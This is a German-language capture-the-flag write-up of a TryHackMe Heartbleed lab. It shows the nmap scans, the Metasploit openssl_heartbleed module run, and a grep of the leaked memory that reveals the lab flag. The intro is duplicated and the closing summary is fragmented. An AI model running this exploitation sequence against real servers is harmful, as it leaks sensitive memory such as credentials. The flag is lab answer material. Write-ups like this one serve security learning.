
Das Ziel dieses Projekts war es, einen entfernten Host auf die Heartbleed-Sicherheitslücke (CVE-2014-0160) zu überprüfen, deren Vorhandensein zu bestätigen und sie auszunutzen, um potenziell sensible Informationen aus dem Serverspeicher über das TLS-Protokoll zu extrahieren.
Das Ziel dieses Projekts war es, einen entfernten Host auf die Heartbleed-Schwachstelle (CVE-2014-0160) zu überprüfen, deren Vorhandensein zu bestätigen und sie auszunutzen, um potenziell sensible Informationen aus dem Serverspeicher über das TLS-Protokoll zu extrahieren.
Identifizierung offener Dienste (Nmap)
nmap -sC -sV 52.215.184.158
Ergebnis:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4
111/tcp open rpcbind 2-4
443/tcp open ssl/http nginx 1.15.7
| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after: 2020-02-16T10:41:14
Das TLS-Zertifikat war selbstsigniert und abgelaufen. Dies legte den Verdacht nahe, dass die OpenSSL-Version veraltet sein könnte. Zielport: 443.
Heartbleed-Schwachstellenprüfung (Nmap-Skript)
nmap -p 443 --script ssl-heartbleed 52.215.184.158
Ergebnis:
| ssl-heartbleed:
| VULNERABLE:
| OpenSSL 1.0.1 is vulnerable to Heartbleed
| State: VULNERABLE
| Risk factor: High
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
Das Ziel bestätigt sich als anfällig für Heartbleed.
Ausnutzung (Metasploit Framework)
msfconsole
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 52.215.184.158
run
Ergebnis:
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin
Der Speicher wurde erfolgreich ausgelesen und lokal zur Analyse gespeichert.
Analyse des Speicherauszugs
strings openssl.heartble_152689.bin | grep -i "THM{"
Ergebnis:
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}
Vertrauliche Daten, einschließlich eines Anwendungsflags, wurden erfolgreich aus dem TLS-Speicher extrahiert – was bestätigt, dass die Schwachstelle praktisch ausgenutzt werden kann, um sensible Informationen preiszugeben.
Ich habe CVE-2014-0160 erfolgreich auf einem entfernten Server identifiziert und ausgenutzt. Der Prozess umfasste:
THM{sSl-Is-BaD}) aus dem SpeicherDas Vorhandensein von Heartbleed in einem öffentlich zugänglichen System birgt ein kritisches Risiko: